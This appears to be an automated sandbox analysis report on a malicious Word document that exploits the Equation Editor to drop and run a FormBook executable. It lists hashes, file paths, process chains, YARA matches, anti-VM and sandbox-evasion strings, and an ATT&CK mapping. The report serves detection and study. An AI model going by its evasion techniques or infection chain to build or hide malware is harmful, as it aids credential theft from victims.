          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E1F28
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E1F18
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_006E06D5
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_007558C0
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_0075845F
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_0075852B
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
          Source: princedanx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedanx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: princedan859323.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: princedanx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: princedan859323.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: princedan859323.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@24/10@2/1
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$4018308875.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC12C.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO4018308875.docReversingLabs: Detection: 41%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E48B5 push eax; retf
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002E29DF push eax; retf
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_006E1E8E push 8B032975h; retf
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\princedan859323.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeFile created: C:\Users\user\AppData\Local\Temp\princedan859323.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeWindow / User API: threadDelayed 1629
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2664Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeThread delayed: delay time: 922337203685477
          Source: princedan859323.exeBinary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: princedan859323.exeBinary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
          Source: princedan859323.exeBinary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeMemory allocated: page read and write | page guard
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeProcess created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeQueries volume information: C:\Users\user\AppData\Roaming\princedan859323.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution13Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
